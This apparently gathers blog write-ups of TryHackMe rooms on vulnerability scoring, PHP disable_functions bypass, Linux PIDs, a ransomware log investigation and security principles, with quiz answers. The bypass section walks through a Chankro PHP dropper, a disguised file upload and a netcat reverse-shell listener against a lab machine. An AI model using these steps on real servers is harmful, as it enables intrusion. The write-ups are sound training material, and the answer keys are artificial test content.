Cybersecurity is big business in the modern-day world. The hacks that we hear about in newspapers are from exploiting vulnerabilities. In this room, we're going to explain exactly what a vulnerability is, the types of vulnerabilities and how we can exploit these for success in our penetration testing endeavours.


An enormous part of penetration testing is knowing the skills and resources for whatever situation you face. This room is going to introduce you to some resources that are essential when researching vulnerabilities, specifically, you are going to be introduced to:

• What vulnerabilities are
• Why they're worthy of learning about
• How are vulnerabilities rated
• Databases for vulnerability research
• A showcase of how vulnerability research is used on ACKme's engagement

Introduction to Vulnerabilities

A vulnerability in cybersecurity is defined as a weakness or flaw in the design, implementation or behaviours of a system or application. An attacker can exploit these weaknesses to gain access to unauthorised information or perform unauthorised actions. The term “vulnerability” has many definitions by cybersecurity bodies. However, there is minimal variation between them all.

For example, NIST defines a vulnerability as “weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source”.

Vulnerabilities can originate from many factors, including a poor design of an application or an oversight of the intended actions from a user.

We will come on to discuss the various types of vulnerabilities in a later room. However, for now, we should know that there are arguably five main categories of vulnerabilities:

1) An attacker has been able to upgrade the permissions of their system account from "user" to "administrator". What type of vulnerability is this?

Ans- Operating System



2) You manage to bypass a login panel using cookies to authenticate. What type of vulnerability is this?

Ans- Application logic

Scoring Vulnerabilities (CVSS & VPR)

Vulnerability management is the process of evaluating, categorising and ultimately remediating threats (vulnerabilities) faced by an organisation.

It is arguably impossible to patch and remedy every single vulnerability in a network or computer system and sometimes a waste of resources.

After all, only approximately 2% of vulnerabilities only ever end up being exploited (Kenna security., 2020). Instead, it is all about addressing the most dangerous vulnerabilities and reducing the likelihood of an attack vector being used to exploit a system.

This is where vulnerability scoring comes into play. Vulnerability scoring serves a vital role in vulnerability management and is used to determine the potential risk and impact a vulnerability may have on a network or computer system. For example, the popular Common Vulnerability Scoring System (CVSS) awards points to a vulnerability based upon its features, availability, and reproducibility.


Of course, as always in the world of IT, there is never just one framework or proposed idea. Let’s explore two of the more common frameworks and analyse how they differ.

Common Vulnerability Scoring System

First introduced in 2005, the Common Vulnerability Scoring System (or CVSS) is a very popular framework for vulnerability scoring and has three major iterations. As it stands, the current version is CVSSv3.1 (with version 4.0 currently in draft) a score is essentially determined by some of the following factors (but many more):



1. How easy is it to exploit the vulnerability?
2. Do exploits exist for this?
3. How does this vulnerability interfere with the CIA triad?
 
 

In fact, there are so many variables that you have to use a calculator to figure out the score using this framework. A vulnerability is given a classification (out of five) depending on the score that is has been assigned. I have put the Qualitative Severity Rating Scale and their score ranges into the table below.

However, CVSS is not a magic bullet. Let's analyse some of the advantages and disadvantages of CVSS in the table below:

Vulnerability Priority Rating (VPR)

The VPR framework is a much more modern framework in vulnerability management - developed by Tenable, an industry solutions provider for vulnerability management. This framework is considered to be risk-driven; meaning that vulnerabilities are given a score with a heavy focus on the risk a vulnerability poses to the organisation itself, rather than factors such as impact (like with CVSS).

Unlike CVSS, VPR scoring takes into account the relevancy of a vulnerability. For example, no risk is considered regarding a vulnerability if that vulnerability does not apply to the organisation (i.e. they do not use the software that is vulnerable). VPR is also considerably dynamic in its scoring, where the risk that a vulnerability may pose can change almost daily as it ages.

VPR uses a similar scoring range as CVSS, which I have also put into the table below. However, two notable differences are that VPR does not have a "None/Informational" category, and because VPR uses a different scoring method, the same vulnerability will have a different score using VPR than when using CVSS

Let's recap some of the advantages and disadvantages of using the VPR framework in the table below.

1) What year was the first iteration of CVSS published?

Ans- 2005




2) If you wanted to assess vulnerability based on the risk it poses to an organisation, what framework would you use?

Note: We are looking for the acronym here.

Ans- VPR





3) If you wanted to use a framework that was free and open-source, what framework would that be?

Note: We are looking for the acronym here.

Ans- CVSS

Vulnerability Databases

Throughout your journey in cybersecurity, you will often come across a magnitude of different applications and services. For example, a CMS whilst they all have the same purpose, often have very different designs and behaviours (and, in turn, potentially different vulnerabilities).

Thankfully for us, there are resources on the internet that keep track of vulnerabilities for all sorts of software, operating systems and more! This room will showcase two databases that we can use to look up existing vulnerabilities for applications discovered in our infosec journey, specifically the following websites:

1. NVD (National Vulnerability Database)

2. Exploit-DB

Before we dive into these two resources, let's ensure that our understanding of some fundamental key terms is on the same page:

While this website helps keep track of new vulnerabilities, it is not great when searching for vulnerabilities for a specific application or scenario.

Exploit-DB

Exploit-DB is a resource that we, as hackers, will find much more helpful during an assessment. Exploit-DB retains exploits for software and applications stored under the name, author and version of the software or application.

We can use Exploit-DB to look for snippets of code (known as Proof of Concepts) that are used to exploit a specific vulnerability.

1) Using NVD, how many CVEs were submitted in July 2021?

Ans -



2) Who is the author of Exploit-DB?

Ans -

An Example of Finding a Vulnerability

In this task, I’m going to demonstrate the process of finding one minor vulnerability, coupled with some research of the vulnerability databases leading to a much more valuable vulnerability and exploit ultimately.

Throughout an assessment, you will often combine multiple vulnerabilities to get results. For example, in this task, we will leverage the “Version Disclosure” vulnerability to find out the version of an application. With this version, we can then use Exploit-DB to search for any exploits that work with that specific version.

Applications and software usually have a version number. This information is usually left with good intentions; for example, the author can support multiple versions of the software and the likes. Or sometimes, left unintentionally.

For example, in the screenshot below, we can see that the name and version number of this application is “Apache Tomcat 9.0.17”

With this information in hand, let’s use the search filter on Exploit-DB to look for any exploits that may apply to “Apache Tomcat 9.0.17”.TryHackMe Vulnerability 101

Great! After searching Exploit-DB, there are a total of five exploits that may be useful to us for this specific version of the application.



1) What type of vulnerability did we use to find the name and version of the application in this example?

Ans-

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

Bypass Disable Functions

Practice bypassing disabled dangerous features that run operating system commands or start processes.

This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.

It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.


Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.

One of the easiest techniques to implement and not very widespread is to abuse the mail() and putenv() functionalities. This technique is not new, it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.



Chankro: tool to evade disable_functions and open_basedir


Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.

Install tool:

git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help



python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.




 

Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

My command run successfully, and I created a file in the directory with the output of the command.

 

First of all we will start machine of tryhackme room bypass disable function and after search room's IP what do we see there!! there is upload page where we can upload a any image and execution file via Burp Suite because we have to upload by bypassing the PHP file. 

and after uploading malicious file we have to check in which directory the file is uploaded? so for this we will use gobuster for find a directory.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.162/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
/cv.php               (Status: 200) [Size: 4153]                                  
Progress: 98580 / 441122 (22.35%) 

if you want to check which port is open in this site then you can do this with NMAP or RUSTSCAN.

  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
|   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
|   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ 
  

We got a file uploaded directory /uploads

when listing the web with the tool wappalyzer you can see that the web has as a programming language PHP

With this in we can see that the file mind phpinfo.php is available, this file gives us information about the server configuration and the settings to interpret a php for example. 

Looking at the information that gives us, phpinfo we can see a section called disable_funtions and in it many critical variables are set, such as:

    exec
    passthru
    shell_exec
    system
    proc_open
    popen
    curl_exec
    curl_multi_exec

 

As we can see that we are very limited when it comes to uploading a file php which contains malicious code for our benefit but investigating and thanks to the information provided by this machine we can make use of the tool Chankro .

This tool allows us to execute commands through the mail () and putenv () functions by changing an environment variable with which it executes the binary sendmail . An explanation of what it does is at a low level explained in this article .

To test if the tool works we are going to execute a whoami and deposit it in the absolute path of the web, which is hosted in /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/ this is known since in phpinfo you can see the path in where the web is hosted.

I will use the tool Chankro with the following paramters but before we create a c.sh file 

sudo nano c.sh

python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads. 

┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php


[+] File created!
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$     

once the malicious file is created, it creates the file for us, i will php go to the web and upload it.

and file uploading time we intercept the request and changed the content-type (image/jpeg) and write a GIF87a

What is GIF87a?

GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animationcapabilities.

check a file uploaded or not in /uploads directory

Gaining Access 

Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that when it is executed I will start a revershell to my machine on port 443:


With this in mind and already modified the file command.sh I recreate the file winsad.php with Chankro and once created I add the header 'GIF89a;' and upload the file.

Since I went back up the php and going to the path where is hosted winsad.php I can see that the code interprets me and gives me the shell : 

Start a netcat listener and click on that uploaded file-

nc -nvlp 4444

Once inside the machine we can go to the user's directory s4vi and view the flag.

www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
<ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
www-data@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
cd s4vi
www-data@ubuntu:/home/s4vi$ 
ls -la



www-data@ubuntu:/home/s4vi$ ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$ 



www-data@ubuntu:/home/s4vi$ cat flag.txt
cat cat flag.txt
cat: cat: No such file or directory
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/home/s4vi$ 

We got it!!! 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

PID In Linux

A PID is an acronym for the process identification number. PID is automatically assigned to each process when it is created on a linux operating system. The init or systemd is always the first process on the linux operating system and is the parent of all other processes. PID In Linux

How do i find the PID in linux?

1) Open the terminal application
2) Type the pidof command as follows to find PID for firefox process: pidof firefox.
3) Or use the ps command along with grep command as follows: ps aux| grep -i firefox/
4) To look up or signal processess based on name use.

Every time a user or the system (Linux) launches a program, the kernel will create a process. A process holds execution details of the program in memory such as its input and output data, variables and so on.

Importantly, since Linux is a multitasking operating system, it executes several programs simultaneously.

The kernel identifies each process using a process ID (PID), a every instance of process must have a unique PID from other processes which is assigned when the process is invoked, to avoid any execution errors.

The /proc file system stores information about currently running processes on your system, it contains directories for each process.



$ ls /proc
OR
$ ls /proc | less

You can monitor processes and their PIDs using traditional Linux commands such as ps, top and relatively new glances command plus many more as in the examples below:


$ ps aux
 

Show Running Processes with PID

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

Hello guys, This is writeup for the room of tryhackme Dunkle Materie from the TryHackMe platform. This room is a medium room that lets users investigate the ransomware attack using an application called ProcDOT.

 

The firewall alerted the Security Operations Center that one of the machines at the Sales department, which stores all the customers' data, contacted the malicious domains over the network. When the Security Analysts looked closely, the data sent to the domains contained suspicious base64-encoded strings. The Analysts involved the Incident Response team in pulling the Process Monitor and network traffic data to determine if the host is infected. But once they got on the machine, they knew it was a ransomware attack by looking at the wallpaper and reading the ransomware note.

I place the logfile into the procmon as in the figure below.

It doesn't seem to work, so I added the traffic file to Windump.

1) Provide the two PIDs spawned from the malicious executable. (In the order as they appear in the analysis tool)

 

Ans- 8644, 7128

 

2) Provide the full path where the ransomware initially got executed? (Include the full path in your answer)

 

We can see that the red box is the full path where the malware is initially executed, which is the second question.

(The path is redacted for the learning purposes of each user.)

Ans- c:\users\sales\appdata\local\temp\exploreer.exe

3) This ransomware transfers the information about the compromised system and the encryption results to two domains over HTTP POST. What are the two C2 domains? (no space in the answer)

 

 

On the second exploreer.exe, I also found one.

Ans- mojobiden.com,paymenthacks.com

4) What are the IPs of the malicious domains? (no space in the answer)
 

Ans- 146.112.61.108,206.188.197.206





5) Provide the user-agent used to transfer the encrypted data to the C2 channel.

 

For this question, it wanted us to identify the user-agent used to transfer the encrypted data to the C2 channel.

So, by right-clicking the site we found previously, we click on “Follow TCP Stream”.

Ans- Firefox/89.0










6) Provide the cloud security service that blocked the malicious domain.

 

Now, we require to identify the cloud security service that blocked the malicious domain.

So, at the same window, scroll down a bit more. And we can see the server name.

Ans- Cisco Umbrella







7) Provide the name of the bitmap that the ransomware set up as a desktop wallpaper.

 

Ans- ley9kpi9r.bmp







8) Find the PID (Process ID) of the process which attempted to change the background wallpaper on the victim's machine.

 

Ans- 4892







9) The ransomware mounted a drive and assigned it the letter. Provide the registry key path to the mounted drive, including the drive letter.

 

For this part, we need to find the registry key path to the mounted drive, with the drive letter. So, I started with exploreer.exe. I look into each process in detail but failed to find the path.

This really cost me so much time. As I was looking into the registry process and back to exploreer.exe, without realizing that I did not turn off the “no path” option. I wasted like an hour until I realize it. So, after in a rabbit hole for an hour, I manage to find the path.

Ans- HKLM\SYSTEM\MountedDevices\DosDevices\Z:




10) Now you have collected some IOCs from this investigation. Provide the name of the ransomware used in the attack. (external research required)

 

This also takes me a lot of time to research. I do not have an idea on what keyword should I use to search for it.

I tried to search on “ransomware targeting mount drive” and other doesn't help at all. But suddenly I think about the site “hacker” used before. So, I try to use one of the websites and look at it on Google. And BAM! I got it!

Ans- Blackmatter Ransomware

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

The following blog is going to outline some of the fundamental principles of information security. The frameworks used to protect data and systems to the elements of what exactly makes data secure.

The measures, frameworks and protocols discussed throughout this room all play a small part in "Defence in Depth."

Defence in Depth is the use of multiple varied layers of security to an organisation's systems and data in the hopes that multiple layers will provide redundancy in an organisation's security perimeter.

The CIA Triad

The CIA triad is an information security model that is used in consideration throughout creating a security policy. This model has an extensive background, ranging from being used in 1998.


This history is because the security of information (information security) does not start and/or end with cybersecurity, but instead, applies to scenarios like filing, record storage, etc.


Consisting of three sections: Confidentiality, Integrity and Availability (CIA), this model has quickly become an industry standard today. This model should help determine the value of data that it applies to, and in turn, the attention it needs from the business.

The CIA triad is unlike a traditional model where you have individual sections; instead, it is a continuous cycle. Whilst the three elements to the CIA triad can arguably overlap, if even just one element is not met, then the other two are rendered useless (similar to the fire triangle). If a security policy does not answer these three sections, it is seldom an effective security policy.


Whilst the three elements to the CIA triad are arguably self-explanatory, let's explore these and contextualise them into cybersecurity.

Confidentiality

This element is the protection of data from unauthorized access and misuse. Organisations will always have some form of sensitive data stored on their systems. To provide confidentiality is to protect this data from parties that it is not intended for.


There are many real-world examples for this, for example, employee records and accounting documents will be considered sensitive. Confidentiality will be provided in the sense that only HR administrators will access employee records, where vetting and tight access controls are in place. Accounting records are less valuable (and therefore less sensitive), so not as stringent access controls would be in place for these documents. Or, for example, governments using a sensitivity classification rating system (top-secret, classified, unclassified)

Integrity

The CIA triad element of integrity is the condition where information is kept accurate and consistent unless authorized changes are made. It is possible for the information to change because of careless access and use, errors in the information system, or unauthorized access and use. In the CIA triad, integrity is maintained when the information remains unchanged during storage, transmission, and usage not involving modification to the information. Steps must be taken to ensure data cannot be altered by unauthorised people (for example, in a breach of confidentiality).


Many defences to ensure integrity can be put in place. Access control and rigorous authentication can help prevent authorized users from making unauthorized changes. Hash verifications and digital signatures can help ensure that transactions are authentic and that files have not been modified or corrupted.

Availability

In order for data to be useful, it must be available and accessible by the user.

The main concern in the CIA triad is that the information should be available when authorised users need to access it.

Availability is very often a key benchmark for an organisation. For example, having 99.99% uptime on their websites or systems (this is laid out in Service Level Agreements). When a system is unavailable, it often results in damage to an organisations reputation and loss of finances. Availability is achieved through a combination of many elements, including:
 

Having reliable and well-tested hardware for their information technology servers (i.e. reputable servers)
 

Having redundant technology and services in the case of failure of the primary    

Implementing well-versed security protocols to protect technology and services from attack




1) What element of the CIA triad ensures that data cannot be altered by unauthorised people?

Ans - Integrity


2) What element of the CIA triad ensures that data is available?

Ans - Availability


3) What element of the CIA triad ensures that data is only accessed by authorised people?

Ans - confidentiality


 

Principles of Privileges

It is vital to administrate and correctly define the various levels of access to an information technology system individuals require.


The levels of access given to individuals are determined on two primary factors:

• The individual's role/function within the organisation
• The sensitivity of the information being stored on the system

Two key concepts are used to assign and manage the access rights of individuals, two key concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (or PAM for short).


Initially, these two concepts can seem to overlap; however, they are different from one another. PIM is used to translate a user's role within an organisation into an access role on a system. Whereas PAM is the management of the privileges a system's access role has, amongst other things.


What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties. Other people should be able to trust what people write to.


As we previously mentioned, PAM incorporates more than assigning access. It also encompasses enforcing security policies such as password management, auditing policies and reducing the attack surface a system faces.







1) What does the acronym "PIM" stand for?

Ans- Privileged identity management



2) What does the acronym "PAM" stand for?

Ans - Privileged Access Management



3) If you wanted to manage the privileges a system access role had, what methodology would you use?

Ans - PAM


4) If you wanted to create a system role that is based on a users role/responsibilities with an organisation, what methodology is this?

Ans - PIM

Security Models Continued

Before discussing security models further, let's recall the three elements of the CIA triad: Confidentiality, Integrity and Availability. We've previously outlined what these elements are and their importance. However, there is a formal way of achieving this.


According to a security model, any system or piece of technology storing information is called an information system, which is how we will reference systems and devices in this task.


Let's explore some popular and effective security models used to achieve the three elements of the CIA triad.

The Bell-La Padula Model

The Bell-La Padula Model is used to achieve confidentiality. This model has a few assumptions, such as an organisation's hierarchical structure it is used in, where everyone's responsibilities/roles are well-defined.


The model works by granting access to pieces of data (called objects) on a strictly need to know basis. This model uses the rule "no write down, no read up".

The Bell LaPadula Model is popular within organisations such as governmental and military. This is because members of the organisations are presumed to have already gone through a process called vetting. Vetting is a screening process where applicant's backgrounds are examined to establish the risk they pose to the organisation. Therefore, applicants who are successfully vetted are assumed to be trustworthy - which is where this model fits in.

Biba Model

The Biba model is arguably the equivalent of the Bell-La Padula model but for the integrity of the CIA triad.


This model applies the rule to objects (data) and subjects (users) that can be summarised as "no write up, no read down". This rule means that subjects can create or write content to objects at or below their level but can only read the contents of objects above the subject's level.


Let's compare some advantages and disadvantages of this model in the table below:

The Biba model is used in organisations or situations where integrity is more important than confidentiality. For example, in software development, developers may only have access to the code that is necessary for their job. They may not need access to critical pieces of information such as databases, etc.





1) What is the name of the model that uses the rule "can't read up, can read down"?

Ans - The Bell-La Padula Model



2) What is the name of the model that uses the rule "can read up, can't read down"?

Ans - the biba model



3) If you were a military, what security model would you use?

Ans - The Bell-La Padula Model



4) If you were a software developer, what security model would the company perhaps use?

Ans - the biba model

Threat Modelling & Incident Response

Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation's information technology infrastructure and services.


A critical stage of the threat modelling process is identifying likely threats that an application or system may face, the vulnerabilities a system or application may be vulnerable to. 

The threat modelling process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:

• Preparation
• Identification
• Mitigations
• Review

It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:

• Threat intelligence
• Asset identification
• Mitigation capabilities
• Risk assessment

To help with this, there are frameworks such as STRIDE (Spoofing, identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis) infosec never tasted so good!. Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999 is still very relevant today. STRIDE includes six main principles, which I have detailed in the table below:Know About Principles Of Security

A breach of security is known as an incident. And despite all rigorous threat models and secure system designs, incidents do happen. Actions taken to resolve and remediate the threat are known as Incident Response (IR) and are a whole career path in cybersecurity.


Incidents are classified using a rating of urgency and impact. Urgency will be determined by the type of attack faced, where the impact will be determined by the affected system and what impact that has on business operations.

An incident is responded to by a Computer Security Incident Response Team (CSIRT) which is prearranged group of employees with technical knowledge about the systems and/or current incident. To successfully solve an incident, these steps are often referred to as the six phases of Incident Response that takes place, listed in the table below:

1) What model outlines "Spoofing"?

Ans - STRIDE



2) What does the acronym "IR" stand for?

Ans - incident response



3) You are tasked with adding some measures to an application to improve the integrity of data, what STRIDE principle is this?

Ans - Tampering



4) An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

Ans - Recovery